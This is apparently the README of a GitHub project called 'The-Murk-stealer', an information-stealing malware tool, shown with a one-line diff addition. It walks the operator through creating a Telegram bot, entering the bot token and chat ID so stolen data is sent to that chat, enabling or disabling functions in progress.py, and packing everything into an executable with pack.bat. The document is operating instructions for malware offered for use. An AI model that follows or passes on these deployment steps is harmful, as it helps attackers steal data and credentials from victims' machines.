Choomai/The-Murk-stealer/README.md

 So firstly, go to the [@BotFather](https://t.me/BotFather) bot and create your own bot, copy HTTP API of bot.
 Now you need to get your chat id.
 To do this, go to the next bot [@ShowJsonBot](https://t.me/ShowJsonBot) and copy the id too.
 Then, insert the HTTP API and the id in separate fields as in example `[1, "HTTP API", "chat ID"]`, don't forget to change the first var from 0 to 1.

+You can comment out any function you don't need in `progress.py`

 **Packing**

 Install required packages and run `pack.bat`.
 The executable will be in `dist`.
 I recommended using a virtual enviorment instead of just install and pack it directly.